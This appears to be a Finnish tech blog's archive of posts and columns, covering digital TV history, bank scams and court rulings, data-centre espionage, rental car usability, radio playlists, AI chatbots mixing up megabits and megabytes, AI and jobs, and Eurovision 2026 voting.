Hyvänä puolena digiuudistuksessa oli tallentavien digiboksien yleistyminen. Kun tv-ohjelma oli vain bittivirtaa, se oli helppo tallentaa kiintolevylle. Analoginen tallennus VHS-nauhureilla alkoi tuntua kivikautiselta. Onnekkaasti taulutelevisioiden läpimurto sattui juuri samaan aikaan, mikä sai monen katsojan vaihtamaan joka tapauksessa laitettaan.

Siirtymäkausi loppui 1.9.2007, kun analogiset antennilähetykset monen lykkäyksen jälkeen sammutettiin. Silloin internet oli jo vallannut niin suuren osuuden ihmisten arjesta, ettei kansallisella tv-projektilla tai maailman ykkösen asemalla ollut merkitystä. Televisiolupamaksu poistettiin vuoden 2013 alusta lähtien ja korvattiin Yle-verolla.

Jakeluverkko on vaihtunut antennista ja kaapelista laajakaistaan. Tallentavat digiboksit ovat vaihtuneet pilvipalveluiksi. Päätelaite on yhä useammin pieni puhelin, ei perinteinen televisio. HbbTV toteutti 10 vuotta myöhässä sen vuorovaikutteisuuden, mitä MHP:lle luvattiin. Joitakin vuosia sitten tv-ohjelmissa näkyi äänestyspainikkeita, mutta ilmeisesti se ei enää ottanut tulta alleen ja niistä on luovuttu. Second screen -ajattelu on hiipunut, koska live-katselu vähenee koko ajan. 

Interaktiivisia mainoksia tai mahdollisuutta tarkistaa, mistä juontaja oli ostanut mekkonsa, ei koskaan tullut. Tällaisia hienoja mahdollisuuksia visioitiin digi-tv-aikaan, ihan oikeasti. Erilaiset keskusteluikkunat, jopa TV-näytöllä (euroviisut, urheilukisat), kuitenkin toteutuivat.

Siirtymäajan televisiomaailmassa ovat paljon pidempiä kuin mihin it-alalla on totuttu. SD-aika ("suttupiirto") loppui 1.4.2025, kun Yle lopetti viimeisetkin perustarkkuuden lähetykset. Toinen digisiirtymä tapahtui siis lähes 18 vuotta ensimmäisen jälkeen. Viimeisetkin kaupalliset kanavat tekivät saman 30.6.2025. Ilmeisesti 4K-siirtymää ei edes tule, televisio on kehittynyt valmiiksi.

Digi-tv:n alkuvuosien historiikki 1997-2007 on vielä kirjoittamatta. Ehkä neljännesvuosisata myöhemmin olisi kulunut riittävästi aikaa. Kirjoittaja voi aloittaa vaikka omasta Kodin digitekniikka -kirjastani (Docendo 2007), jossa tapahtumia on dokumentoitu yhdestä näkökulmasta. 

Ainoa tapaamani kriittinen kirjallinen viittaus noihin aikoihin on Iltalehden entisen päätoimittajan muistelmissa (Kari Kivelä: Punkkari ja mediapomo, Otava 2025). Joku muukin voisi palata noihin vuosiin ja niissä maksettuihin oppirahoihin. Sieltä löytyvät syyt tv-median nykyiseen tilaan. Kotimaiset toimet ehkä jouduttivat kehitystä ja tulivat kansalaisille kalliiksi, mutta kehitys itsessään oli väistämätön.

Nettirosvoja tuomiolla, mutta uusia yrittäjiä riittää

Viime vuonna tuli runsaasti uutisia pankkihuijausten uhriksi joutuneista asiakkaista. Tänä vuonna uutisointi on ollut hiljaisempaa, mikä toivottavasti kertoo pankkien suojausten parantumisesta. Pankkien tietoon tulleet huijaukset lisääntyivät v. 2025 148 miljoonaan euroon (+38% edelliseen vuoteen verrattuna), mutta tärkeämpää on, että estettyjen ja palautettujen maksujen määrä kasvoi +70 % kun taas menetysten kasvu oli "vain" +15 %. Trendi on siis oikeaan suuntaan.

Nordean viiveellistä tiliä tosin odotetaan vieläkin, vaikka luvatusta aikataulusta on kulunut jo puolitoista vuotta.

Pankit ovat ottaneet käyttöön itse asetettavia maksu- ja siirtorajoituksia. Ne kannattaa asettaa, mutta ihmisillä on turhan optimistinen kuva niiden tehosta. Jos rosvo saa aktivoitua tunnistuksen omaan puhelimeensa, uhri käytännössä menettää tilinsä hallinnan, eikä itse asetetuilla rajoilla ole vaikutusta. 

Kuka tahansa voi joutua pankkihuijauksen uhriksi. Paras suojautumiskeino on se, ettei säilytä tilillä suuria rahamääriä ja pitää luotto-ominaisuuden mahdollisimman pienenä. Se vähentää vahinkoa, jos rosvo pääsee läpi.

Iltalehti siteeraa jälleen hyvää työtä tekevän Itä-Suomen poliisin kuvauksia toteutuneista huijauksista. On erikseen pankkihuijaukset ja sitten sijoitushuijaukset. Yhteistä tapauksille tuntuu olevan uhrien ikä: valtaosa heistä on syntynyt 1950-luvulla. Lukuisat varoitukset turvatileistä, etäkäyttöohjelmien asentamisesta ja suurista sijoitustuotoista eivät näytä vieläkään tavoittaneen kaikkia. Summat ovat edelleen suuria ja menetykset lasketaan viisinumeroisissa luvuissa.

Yksi pankkihuijauksista koskee nuorempaa uhria. Tietoturva-asiantuntijaksi esittäytynyt huijari vei 1980-luvulla syntyneen naisen ja hänen hallitseman yhdistyksen tililtä yli 17 000 euroa. Nelikymppisen, joka lisäksi hallitsee yhdistyksen rahaliikennettä, pitäisi olla tietoinen huijaussoittojen vaaroista. Tapaus muistuttaa siitä, että kuka tahansa voi mennä ansaan.

Sijoitushuijaukset eivät katso ikää. Iltalehden tiivistelmässä mainitaan 1990-luvulla syntynyt nainen, joka menetti 17 000 euroa Facebookista alkaneessa sijoitushuijauksessa.  

Median otsikoissa kerrotaan rikoksista ja epäonnistumisista. Uutiset tuomioista ovat harvinaisia, mutta niitäkin löytyy.

21-vuotias tamperelaismies tuomittiin 4,5 vuoden vankeuteen 650 000 euron tekstiviestihuijauksesta. Uhreja oli kymmenittäin, suurin yksittäinen menetys 170 000 euroa. Tekijä Jasper Laine kertoi saaneensa ohjeet tuntemattomalta henkilöltä ja oman 30 000 euron palkkionsa kryptovaluuttana. Alle viiden prosentin "provisio" vakavista rikoksista kuulostaa pieneltä.

Toisessa tapauksessa Turun seudulla asunut nuorimies huijasi 177 000 euron arvosta rikoshyötyä Mobilepayn nimissä lähetetyillä huijausviesteillä. Huijaamisen hyötysuhde on huono: 91 000 tekstiviestillä sai kalasteltua vain 17 uhria, mutta huijausten keskimääräiseksi arvoksi tulee kuitenkin 10 000 euroa. 

Toivottavasti uutiset välittävät viestin rikollisille asti. Pankkihuijaukset eivät ole helppo tapa tehdä rahaa, vaan oikeita rikoksia, joista jää nykyään myös kiinni. 

Lisäys 23.8.2026: Helsingin Sanomat uutisoi, että ihmisten tilejä on tyhjennetty näiden huomaamatta ("Huijarit pääsivät suomalaisten verkkopankkeihin, vaikka nämä eivät luovuttaneet tunnuksia kenellekään"). Uutisessa ei kuitenkaan kerrota, miten tämä voisi onnistua. On lukuisia tapauksia, joissa uhri omasta mielestään ei ole luovuttanut tunnuksia kenellekään, mutta hyvin todennäköisesti näin on kuitenkin tapahtunut. Uhri ei enää muista, että kirjautui edellisenä päivänä Omakantaan tai Kelan sivuille, tai että verkkopankin kirjautuminen epäonnistui aluksi ja vaati useampia yrityksiä. Ellei lehdellä ole näyttöä asiasta, tällainen otsikointi on harhaanjohtavaa ja haitallista.

Maailman rikkain mies ennustaa: Työstä tulee vapaaehtoista – ja siksi säästäminen kannattaa lopettaa (kolumni)

Maailman rikkain mies ennustaa: Työstä tulee vapaaehtoista – ja siksi säästäminen kannattaa lopettaa

Kauan odotettu kesälomakausi on pian täällä. Työasiat unohtuvat, kun suomalainen viettää aikaansa mökillä, harrastuksissa tai ulkomailla matkustellen.

Entä jos kesäloma jäisi pysyväksi? Entä jos syksyllä ei tarvitsisikaan palata sorvin ääreen, vaan voisi jatkaa oman näköistä elämää mökillä ja harrastuksissa, loputtomasta vapaa-ajasta nauttien?

Elon Muskilla on hyviä uutisia kaikille kesälomalaisille. Hän uskoo, että 10–20 vuoden kuluttua työn tekeminen muuttuu vapaaehtoiseksi ja siksi eläkepäivien varalle säästäminen kannattaa lopettaa jo nyt.

Tekoäly vie työpaikat, mutta se ei haittaa. Robotit ja tekoäly tuottavat tavaroita ja palveluita niin tehokkaasti, että ihmiskunta siirtyy uuteen yltäkylläisyyden aikaan. Raha menettää merkityksensä.

Tervetuloa ikuinen kesäloma, hyvästi työn orjuus!

Muskin ajatukset kuulostavat huimilta, mutta eivät kovin realistisilta. Kenen tahansa muun esittämänä ne voisi ohittaa olankohautuksella. Tieteiskirjailijat ja poliitikot ovat ideoineet hullumpaakin.

Teknomiljardöörien näkemyksiä kannattaa kuitenkin kuunnella, sillä heillä on valtaa. Ja ainakin Muskilla on visio – jokin arkista puurtamista suurempi tavoite.

Meillä Suomessa tekoälyn tavoitteena tuntuu olevan vain yrityksen kilpailukyvyn parantaminen tai omien töiden helpompi hoitaminen. Pelkkää näpertelyä siis. Kukaan ei edes uskalla pohtia isoa kuvaa tulevaisuudesta.

Jos meillä itsellä ei ole näkemystä, olemme Muskin kaltaisten toimijoiden vietävissä.

Muskin kunniaksi on laskettava se, että hän sentään ajattelee ääneen. Nyt olisi meidän vastata.

Elon Muskista on tullut digiajan Karl Marx. Hänen teoreettisessa maailmassaan kapitalismi on kiertänyt täyden ympyrän. Tuloksena on kommunismi 2.0, joka toteuttaa teknologian avulla ikivanhan unelman työläisten paratiisista.

Voisiko digitaalinen kommunismi toimia? Tuskinpa vain. Digitaalista tai ei, kommunismi on havaittu huonoksi jo monta kertaa, sillä se on ihmisluonnolle vierasta.

Muskin käsitys kansantaloudesta on superrikkaalle tyypillinen. Vaikka robotit tekisivät työn ja tuotantokustannukset putoaisivat nollaan, vapaassa maailmassa kaikki ei koskaan tule olemaan kaikkien ulottuvilla.

Jokainen ei voi asua Aurinkorannikolla tai hulppeissa kattohuoneistoissa kaupunkien keskustassa. Maailmaa syleilevä ylenpalttisuus törmää viimeistään luonnonvarojen rajallisuuteen. Työ tai raha eivät ole ainoita niukkoja resursseja.

Valtaosa ihmisistä tarvitsee työtä muuhunkin kuin elannon hankkimiseen. Elämä ilman ponnistelua tai tavoitteita ei olisi utopia vaan dystopia, joka johtaisi ihmiskunnan taantumiseen ja romahdukseen.

Työ antaa ryhtiä ja järjestystä elämään. Työn vapaaehtoisuus johtaisi tarkoituksettomuuteen, päihteisiin ja ääriajatteluun.

Ihmiset eivät halua olla samanlaisia vaan erottua toisistaan, kilpailla keskenään, menestyä ja saada arvostusta muilta. Raha ja fyysinen materia ovat menestyksen mittareita. Niiden poistamisella olisi arvaamattomia seurauksia.

Viimeinen, paljastava kysymys on tämä: jos Musk oikeasti uskoo omia puheitaan, miksi hän itse tavoittelee tuhannen miljardin omaisuutta, vaikka on jo nyt ylivoimaisesti maailman rikkain?

AI-buumi kerryttää satumaista varallisuutta yhä harvemmalle, mikä on täysin vastakkainen kehityskulku Muskin ajatuksille.

Entä se ikuinen kesäloma? Kuulostaa hyvältä ajatukselta ainakin näin kesän alussa.

Mutta hetkinen – sehän tarkoittaisi myös, etteivät lapset palaisi syksyllä kouluun vaan jäisivät kotiin vanhempiensa iloksi ja riesaksi.

Ehkä kotiopetuksen hoitaisi robotti, mutta mitä lapsille kannattaisi edes opettaa maailmassa, jossa kaikki tekeminen on vapaaehtoista?

Ja kuka hoitaisi vanhukset, sairaat, poliisitoimen, palokunnan ja maanpuolustuksen?

Ehkä työ on sittenkin ihmiselle hyväksi ja kesäloma ihana juuri siksi, että sen pituus on rajoitettu.

Jos tekoäly uhkaa tehdä kesälomista loputtomia, sen ei saa antaa tapahtua.

Julkaistu alun perin Tivi-lehdessä 6/2026.

SUPO: Venäjä vakoilee suomalaisia datakeskusten kautta

Helsingin Sanomien heinäkuinen uutinen hätkähdytti: Venäjä käyttää Suomen datakeskuksia vakoiluun. Jutussa siteerattiin Supolta saatuja tietoja, jonka mukaan Venäjä ja Kiina käyttävät Suomessa sijaitsevia datakeskuksia kybervakoiluun.

Herää epäilys, että joku on ymmärtänyt jotain väärin. Ainakin termin "datakeskus" käyttäminen tässä yhteydessä on harhaanjohtavaa, ottaen huomioon miten tulenarka termistä on tullut. Datakeskusten sähkönkulutus, verotus ja ympäristövaikutukset ovat koko ajan esillä Suomen mediassa.

Suora sitaatti Hesarin jutusta: "Lähettämässään sähköpostissa supo kirjoittaa, että suomalaisten datakeskusten tehdyn kybervakoilun määrä on kasvanut Suomessa merkittävästi koko 2020-luvun ajan." Lauseesta puuttuu selvästi jotain, eikä sitä ole korjattu ainakaan nettiversioon. Huolimatonta työtä Hesarilta, mutta nykyään valitettavan yleistä mediassa.

Juttua lukemalla itselle syntyy käsitys, että kyse ei ole varsinaisista datakeskuksista vaan pikemminkin hosting-palveluista. Kuka tahansa voi vuokrata tilaa konesalista ja alkaa myydä sitä eteenpäin rikollisten käyttöön. Myös oman konesalin perustaminen on helppoa, eikä toiminta ole luvanvaraista. 

Yleensä datakeskuksella tarkoitetaan kuitenkin isoa, tähän tehtävään rakennettua konesalia, jossa toimii rakennuttajan omia palvelimia. Hostingin ja datakeskuksen raja on veteen piirretty viiva, mutta likimain sama kuin kioskilla ja ostoskeskuksella. Kioskia ei pidä kutsua ostoskeskukseksi, vaikka siellä onkin tarjolla erilaisia tuotteita eri valmistajilta.

Juttu sisältää huolestuttavan tiedon ns. bullet proof -hostingpalveluiden leviämisestä Suomeen. Saksassa ja varsinkin Hollannissa on jo pitkään toiminut rikollisia yrityksiä, jotka tarjoavat palvelintilaa hakkerien, piraattien, lapsipornon levittäjien ym. käyttöön. Yritykset eivät halua puuttua laittomuuksiin eivätkä tuntea asiakkaitaan, joten palveluista maksetaan käteisellä tai kryptovaluutoilla. Tietoliikenteestä ei pidetä lokeja, joten poliisi ei pääse tutkimaan epäiltyjä rikoksia.

Tällaista toimintaa ei saa päästää leviämään Suomeen datakeskusten vanavedessä. Lain on velvoitettava hosting-operaattorit tuntemaan asiakkaansa ja sulkemaan heidän palvelunsa, mikä toiminta havaitaan laittomaksi. Kirjoitin tähän liittyen asiasta jo vuosi sitten. 

Datakeskuksista on tarpeeksi ongelmia ilman, että niitä sotketaan vakoiluun ja kyberhyökkäyksiin.

Autojen käytettävyys heikkenee

Autojen käytettävyys on aina ollut esimerkillistä. Selkeät painikkeet ja mittarit, vuosikymmenten aikana vakioiksi muuttuneet periaatteet. Kun vuokraa auton, ei tarvitse lukea opaskirjaa pystyäkseen ajamaan vieraallakin merkillä.

Tietotekniikan tulo on murentanut vanhan selkeyden. Autoista on tullut tietokoneita, joissa opaskirja olisi tarpeen. Huomasin tämän kesällä, kun vuokrasin ulkomailla kaksi eri autoa.

Ensimmäinen oli Ford Puma. Ennen kuin lähtee ajamaan, on syytä kiertää auto ympäri ja tarkistaa, ettei autossa ole merkitsemättömiä kolhuja tai naarmuja, sekä kirjoittaa ylös matkamittarin lukema ja katsoa, että tankki on täynnä. 

Onko tankki täynnä vai ei?

Vasta jälkikäteen huomasin, että tankki ei todellakaan ollut täynnä, vaan vähän yli puolillaan. Miksi polttoainemittarista pitää tehdä niin vaikeaselkoinen, ettei siitä heti näe täyttöastetta?

Käyttöliittymä oli edellisen vuokraajan jäljiltä espanjaksi, mutta se oli helppo muuttaa. Vaihdevipu aiheutti hämmennystä, sillä se lipsahti helposti alimpaan sport-asentoon tavallisen D:n sijaan. Oikeanpuoleinen viiksi puuttui. Kun tilaa kerran on, miksei pyyhkimiä voi hallita omalla viiksellään?

Ärsyttävintä oli auton toistuva varoittelu muka väsymyksestä. Jos palasi omalle kaistalle ilman vilkkua, tuli huomautus. Pidemmän ajon jälkeen punainen varoitus, joka komensi lepäämään. Turhia ilmoituksia sai olla kuittailemassa yhtenään.

"Heikentyneen vireystilan" keltainen huomautus.

Mutta oli hyviäkin puolia: Carplay yhdisti puhelimen langattomasti isoon keskinäyttöön, jolloin Spotify, ChatGPT ja varsinkin Google Maps toimivat loistavasti.

Yhtä hienosti toimi auton oma nopeusrajoitusten tunnistus. Tarkasti se poimi kulloinkin voimassa olleen rajoituksen, eikä erehtynyt poistumiskaistojen tai lisäkilpienkään kohdalla. Todella hyödyllinen ominaisuus.

Ford Puma oli kevythybridi. Pieni kuvake kertoi, milloin auto käytti jarrutusta tai alamäkeä akun lataamiseen. Ominaisuus ei näkynyt bensapumpulla ja oli muutenkin rasittava, koska kaasujalka oli koko ajan jännittyneenä polkimella. Yhden polkimen ajo oli yksinkertaisesti rasittavaa.

Toinen auto oli Cupra. Pienestä koostaan huolimatta iso tavaratila ja jämäkkä ajaa. Käyttöliittymä oli entistä sekavampi. Olen vuokrannut autoja kymmeniä kertoja ja nyt oli ensimmäinen kerta, kun en löytänyt mistään ajokilometrien määrää.

Mistä näkee kilometrien määrän??

Kokeilin kaikki kolme eri näyttövaihtoehtoa, mikään ei sisältänyt matkamittarin lukemaa. Polttoainemittari aiheutti hämmennystä koko vuokra-ajan. Nopealla vilkaisulla on helppo tulkita niin, että punainen palkki kuvastaa jäljellä olevan polttoaineen määrää, eli se on melkein lopussa.

Haluan lähteä tien päälle, en käydä läpi tutorialia.

Onneksi sentään ilmastointiasetuksia pystyi rajoitetusti säätämään ilman kosketusnäytön apua, tosin nämäkin "painikkeet" toimivat hipaisuperiaatteella.

App Updates?

Tietokone tai älypuhelin tuli mieleen, kun auto tarjosi sovelluspäivityksiä. Vuokra-autossa ohitin ne joka kerta, en halunnut sotkea auton toimintaa enkä perehtyä päivitysten ongelmiin.

10 000 km ylitys.

Kun ajokilometrien määrä ylitti 10 000, auto onnitteli saavutuksesta aivan kuin olisin voittanut videopelissä ("New challenge achieved!"). Ihan pöhköä.

Jossain vaiheessa ajokilometritkin ilmestyivät näkyviin, en vieläkään tiedä miten ja miksi. Cupra huomautti väsymyksestä vain muutaman kerran, ihan asiallisesti. Sen sijaan nopeusrajoitusten tunnistaminen toimi surkeasti. Välillä se kuvitteli näkevänsä vääriä rajoituksia tai poimi rajoituksen pieneltä rinnakkaistieltä. Ilmeisesti tieto perustui ainakin osittain karttadataan eikä kameroihin. Teslassa on sama ongelma, silti sen omistajat jaksavat kehua autoaan loputtomasti, mitä on vaikea ymmärtää.

Tunnistus oli ongelma, sillä Cuprassa oli mainio vakionopeustoiminto, joka asetti rajoituksen suoraan auton nopeudeksi. Luotettavasti toimiessaan olisi hieno juttu. 

Cuprassa oli ällistyttävä ongelma. Välillä ikkunan nostimen toiminta muuttui käänteiseksi. Kun minkä tahansa oven ikkuna oli osittain auki, yritys nostaa ikkuna kiinni saikin sen laskemaan. Tämä toistui, kunnes ikkuna oli kokonaan auki, ja vasta sitten sen sai nostettua ylös.

Oliko kyseessä softabugi? Vai oliko anturi niin herkkä, että se luuli jonkin jääneen ikkunan väliin ja turvasyistä alkoi laskea sitä? Mitään logiikkaa tässä ei ollut, ilmiö esiintyi aivan satunnaisesti. Nettikeskustelusta huomasin muiden Cupran omistajien valittaneen samasta ongelmasta.

En voi ymmärtää Teslan aloittamaa trendiä, jossa kaikki toiminnot laitetaan kosketusnäytön taakse. Sitä ei voi käyttää turvallisesti ajon aikana, koska katse täytyy siirtää tiestä näyttöön ja sormen tarkka kohdistaminen vaatii käden tukemista näytön reunaan. Miten onnistuu talvella hanskat kädessä? Mitä vikaa on perinteisissä painikkeissa, säätöpyörissä ja viisarinäytöissä? Muidenkin arkisten laitteiden kosketusnäytöt ärsyttävät käyttäjiä. 

Haitalliset kaistallapitoavustimet, vireyshälyttimet ja liikennemerkkien tunnistukset voi useimmissa autoissa kytkeä pois käytöstä, mutta asetusten pitäisi olla helppoja tehdä ja mielellään jäädä pysyväksi. Vuokra-autossa niiden tekemiseen ei ole aikaa eikä kiinnostusta.

Jos olet ostamassa uutta autoa, tee kunnollinen koeajo. Ei mitään keskustalenkkiä, vaan pidempi ajo maantiellä, jotta ehdit huomata turhat varoittimet ja haitalliset avustimet. 

Kunnes autovalmistajat palaavat käytettävyydessä pari askelta taaksepäin on parempi pysyä vanhassa autossa.

Ärsyttävät radiomainokset ja Radio Classicin suosikkibiisit

Juuri kukaan ei pidä mainoksista, mutta osa kaupallisten radiokanavien mainoksista on ärsyttäviä. Melkein mikä tahansa mainos alkaa tosin maistua puulta, jos se toistuu liian usein. Samaa kanavaa kuunnellessa näin käy melkein kaikille mainoksille. Vain Puuilon ja Bilteman mainokset ovat poikkeuksia huumorinsa vuoksi. Ne hymyilyttävät kerrasta toiseen, vaikka mainokset oppisi ulkoa. Sisältö tosin vaihtuu kiitettävän usein.

Mainosten suhteen erityisen ärsyttävä kanava on Radio Classic, koska siellä kaupallisia mainoksia on muita kanavia vähemmän, ja siksi kanavan oma Rayo-mainos ("R-A-Y-O") toistuu loputtomasti. Rayo ja "ihan täynnä ääntä" on sinänsä ihan hauska konsepti, mutta podcastista pätkän sisältävä mainos saa karvani nousemaan pystyyn - siis tämä kahden naisen keskustelu:

"Voiko parisuhteessa olla onnellinen, jos toinen rakastaa enemmän kuin toinen? Mä sanon tohon että kyllä voi, siinä kohtaa jos sinä olet se, joka rakastaa ikään kuin hieman vähemmän."  

Lauseessa ei ole mitään järkeä, eikä se ole edes kieliopillisesti oikein. Mainoksen toinen podcast-lainaus liittyy älypuhelinriippuvuuteen, eikä ole (ihan) yhtä ärsyttävä. Nykyään käännän aina kanavaa, kun jompi kumpi näistä pätkistä tunkee eetteriin. 

Ehkä kohdat ymmärtäisi, jos kuuntelisi podcastit kokonaan, mutta mainoksessa ei kerrota niiden nimiä.

Radio Classic: viimeksi soineet.

Kuuntelen paljon Radio Classicia ja kanavan sivulta https://rayo.fi/radio-classic/playlist näkee, mitä teoksia siellä on viimeisen vuorokauden aikana soitettu. Kun kyse on klassisesta musiikista, jossa ei ole päivän hittejä samalla tavalla kuin kevyessä musiikissa, olettaisi tarjonnan olevan hyvinkin laajaa eikä soittolistoja käytetä.

Havaintojeni perusteella levyvalikoima on kyllä laaja, mutta jonkinlainen soittolista on käytössä. Osa kappaleista soi muita useammin, kunnes myöhemmin lista vaihtuu. 

Muutama kappale näyttää soivan kuukaudesta toiseen vähintään kerran vuorokaudessa: Vivaldin Vuodenaikojen talvi, Rimski-Korsakovin Kimalaisen lento, valssi Hatsaturjanin Naamiohuveista ja Sapelitanssi. Esitykset ovat aina samoja,  vaikka levytyksiä näistä olisi kymmenittäin. Ehkä kuuluttajan selitys on tallennettu kiinteästi musiikin perään? Sinfonioista toistuu aina yksi ja sama osa, vieläpä saman orkesterin esittämänä (esim. Houston Symphony Orchestra: Dvorakin 9. sinfonia ja aina 3. osa). 

Näiden klassikoiden lisäksi on teoksia, joiden kohdalla soiton määrää ei selitä ainakaan niiden tunnettuisuus. Ihan kauniita teoksia kyllä, ja hienoa että Radio Classic tekee niitä tunnetuksi. (Linkki Spotifyssä ei ole sama versio kuin Radio Classisin soittama)

• Palladio: Allegretto (Karl Jenkins)
• Der Beherrscher der Geister, Op.27 ("Henkien hallitsija", Carl Maria von Weber)
• Harfenkonzert In C-Dur I. Allegro Moderato (Albrechtsberger)
• String Quartet in F major, Op. 3, No. 5 Osa 2 Andante cantabile (Roman Hoffstetter)
• Alkusoitto oopperasta Pieni Orjatar (Crusell)

Suosittelen kanavaa muillekin. Ei kannata pelästyä klassisen musiikin leimaa, siellä soi myös paljon elokuvamusiikkia. Bonuksena se auttaa löytämään uusia suosikkikappaleita. Itselleni kävi niin esimerkiksi Salierin Faust-alkusoiton kanssa, joka taannoin soi kanavalla vähän väliä.

Tekoäly sekoittaa sekin megabitit ja megatavut

Media sotkee uutisoinnissaan usein megatavut ja megabitit keskenään. Yllättävän vaikeaa se on myös tekoälylle, jonka luulisi osaavan asian paremmin. 

Kuinka monta megabittiä sekunnissa on keskimääräinen siirtonopeus, jos dataa siirtyy 11 gigatavua tunnissa. Helppo laskea itsekin, mutta kokeilin kysyä tekoälyltä. Seuraavat kolme esimerkkiä ovat kaikki maksullisista versioista. 

Anthropicin Claude on lyhyen ytimekäs, mutta väärässä:

Ei näin.

Huolestuttavinta tekoälyjen vastauksissa on, että ne vaikuttavat järkeviltä ja esittävät vaihe vaihteelta, miten päätyivät lopputulokseen. Silloin vastausta on helppo uskoa. Clauden vastaus on kuitenkin selvästi väärin, sillä se ei erota megatavua megabitistä.

ChatGPT 5.5 on vielä havainnollisempi, se laskee tuloksen uskottavan näköisesti.

Myös ChatGPT 5.5 antaa väärän vastauksen.

Tässäkin tulos on väärin, koska laskenta ei ymmärrä eroa tavun ja bitin välillä.

Vertailun yllättäjä on Microsoftin Copilot, joka kolmesta ainoana antaa oikean tuloksen.

Vihdoin oikea tulos, joka on tietenkin kahdeksankertainen edellisiin verrattuna.

Copilot on kovin puhelias, mutta ainakin se erottaa bitit ja tavut toisistaan. Sana "desimaalipohja" lienee suora käännös kantalukua tarkoittavasta 10-kantaisesta järjestelmästä.

Tämä pieni esimerkki muistuttaa jälleen konkreettisesti, miksi tekoälyn antamiin vastauksiin ei pidä luottaa sokeasti. Lopputulos pitää itse tarkistaa, tai ainakin verrata useamman tekoälyn antamia vastauksia toisiinsa.

Tekoäly ei naurata enää – nämä 4 ohjetta voivat pelastaa sinut (kolumni)

Heti pääsiäisen jälkeen Etla julkaisi tutkimuksen, jonka mukaan tekoälyllä on ollut neutraali tai jopa positiivinen vaikutus suomalaisten työhyvinvointiin.

Työn imu oli korkeampi tekoälyä omassa työssään käyttävillä palkansaajilla ja yhteys vahvin niillä, joille tekoäly oli olennainen osa työtä.

Kansainvälisistä tutkimuksista poiketen Suomessa ei havaittu tekoälyn yhteyttä teknologiapelkoihin.

Omaksuimme aikoinaan internetin ensimmäisten maiden joukossa. Ehkä meissä jokaisessa asuu yhä se pieni insinööri, joka siivitti Nokian lentoon ja teki Suomesta 1990-luvulla maailman ensimmäisen tietoyhteiskunnan.

Kyllä meidän taas kelpaa!

Tulosten positiivista viestiä himmentää jossain määrin se, että tutkimusdata päättyy vuoteen 2023. Silloin Chat GPT:tä käytettiin lähinnä hupitarkoituksiin. Sitä pyydettiin kertomaan hassuja vitsejä tai piirtämään kuvia, ja hallusinaatioille naurettiin yhdessä.

Kolme vuotta myöhemmin paljon on muuttunut. Tekoälyn vaikutus työelämään on niin raju, että moni pelkää aidosti työpaikkansa puolesta.

On syytäkin pelätä. Jos et ole yhtään huolissasi omasta työstäsi, et ymmärrä mitä työmarkkinoilla on tapahtumassa.

Hallusinaatioille ei voi enää nauraa, koska ne ovat niin harvinaisia. Monilla toimialoilla tekoäly on ylittänyt odotukset, eikä korkea koulutus tai pitkä osaaminen enää takaa oman työpaikan säilymistä.

Kukaan ei pysty sanomaan, mitä omalle ammatille tapahtuu jatkossa. Jotain kuitenkin tiedämme.

Jos haluat säilyttää työsi, noudata partiolaisten ohjetta: be prepared! Ole valmiina, tapahtui ympärillä mitä tahansa. Seuraa alasi kehitystä, tutustu uusiin työkaluihin ja ole valmiina muuttumaan, kun maailma ympärillä muuttuu.

Pahinta on vanhoihin työtapoihin urautuminen. Kysy itseltäsi joka päivä, ovatko toistamasi rutiinit enää ajan tasalla, vai voisiko asiat tehdä uudella, paremmalla tavalla.

Suomen urautunein ammatti lienee metrojunan kuljettaja. Helsingin metrossa on vain yksi raide, jonka ajaminen edestakaisin on melkeinpä ihmisarvoa loukkaavan mekaanista ja tylsää.

Jos työpäiväsi on henkistä metrojunan kuljettamista, on vain ajan kysymys, milloin tekoäly korvaa sinut.

Toinen ohje: älä yritä kilpailla koneen kanssa. Työn liiallinen imu voi kääntyä haitaksi, sillä aivot tarvitsevat unta ja lepoa; myös pieniä taukoja työtehtävien välissä.

Väsyneet aivot eivät jaksa ideoida eivätkä omaksua uutta. Pelkkä tiedon maksimaalinen haaliminen ei tuo viisautta.

Hän, joka viettää vapaa-ajankin äänikirjoja kuunnellen eikä osaa nauttia rauhasta ja hiljaisuudesta, häviää silti koneen nopeudelle ja oppimiskyvylle.

Ihmisyys on ihmisen paras kilpailuetu konetta vastaan. Siksi kolmas ohje onkin: panosta inhimilliseen vuorovaikutukseen. Pyri löytämään työstäsi elementtejä, joissa ihmisen läsnäolo korostuu, ja kehitä niitä.

Etätyöntekijöille tämä on huono uutinen. Narun päässä oleva työ voidaan ennen pitkää automatisoida, koska se ei vaadi aitoa läsnäoloa.

Tekoälyt ja botit päivystävät jo nyt tylsissä Teams-palavereissa. Mistä tiedetään, onko muussakaan etätyössä oikea ihminen vai pelkkä tekoäly?

Ehkä työkaverisi on jo korvattu aidon näköisellä avatarilla.

Neljäs ohje: kaikki säännöt on tehty rikottaviksi.

Vaikka Helsingin metro olisi pitänyt automatisoida jo kauan ennen tekoälyä, erinäisistä syistä johtuen sitä ei ole pystytty tekemään.

Monet bisnekset perustuvat maailman epätäydellisyyteen. Vaikka palvelut, tiedot ja tavarat voisivat teoriassa liikkua vapaasti, vanhat sopimukset, lait, käytännöt ja asiakastottumukset sotivat prosessien optimointia vastaan.

Tällaiset prosessikiemurat eivät ole loogisia, joten niitä ei jatkossakaan suoristeta tekoälyllä.

Jos työsi perustuu epätäydellisyyteen, se on turvassa vielä pitkään. Työn itsensä kannalta epätäydellisyys on kauneutta.

(Kirjoitus julkaistu Tivi-lehden kolumnina huhtikuussa 2026) 

Euroviisujen äänestys - mikään järjestelmä ei ole oikein

Suomi oli jo varma Euroviisujen voitosta, olihan Liekinheitin vedonlyöjien ylivoimainen suosikki ja Parkkosen & Lampeniuksen saama julkisuus huimaa. Yleensä vedonlyöjät tunnistavat hyvin kansan mielenliikkeet. Mutta kuka sitten äänestää kilpailun aikana onkin eri juttu.

Kansallisten juryjen jälkeen pistetilanne oli seuraava: 

Tuomariäänet.

Voitto oli Suomelta jo karannut, mutta sijoitus oli viides. Bulgaria oli yllättäen noussut selväksi ykköseksi, Australia ja Tanska jakoivat toisen tilan samalla pistemäärällä.

Yleisöäänet muuttivat kaiken:

Euroviisut 2026: lopulliset tulokset.

Israel teki ällistyttävän nousun kahdeksannelta sijalta kakkoseksi, samalla Suomi putosi kuudenneksi. Bulgarian äänivyöry oli vielä suurempi ja se nousi ylivoimaiseksi voittajaksi (516 pistettä vs. Israelin 343).

Voi ihmetellä, miksi Israel singahti yllättäen kakkoseksi yleisöäänillä. Kyse tuskin oli musiikista, mutta moni äänesti Israelia uskontonsa vuoksi tai protestina.

